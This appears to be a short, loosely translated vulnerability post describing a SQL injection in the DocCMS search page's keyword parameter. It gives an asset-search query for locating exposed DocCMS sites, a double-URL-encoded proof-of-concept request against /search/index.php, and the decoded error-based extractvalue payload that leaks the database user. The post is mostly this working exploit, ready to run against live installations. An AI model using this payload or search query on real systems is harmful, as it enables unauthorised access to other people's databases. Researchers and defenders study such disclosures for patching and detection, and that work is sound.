Post

Doccms Keyword Sql Injection Vulnerability

Doccms Keyword Sql Injection Vulnerability

DocCMS keyword SQL injection vulnerability

Vulnerability Description

DocCMS keyword parameter has SQL injection vulnerability, and attackers can obtain database information through the vulnerability.

Vulnerability Impact

DocCMS

Network surveying and mapping

app=”Doccms”

Vulnerability reappears

CMS official website

img

Verify POC

/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33

img

Where payload is the secondary Url encoding of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
This post is licensed under CC BY 4.0 by the author.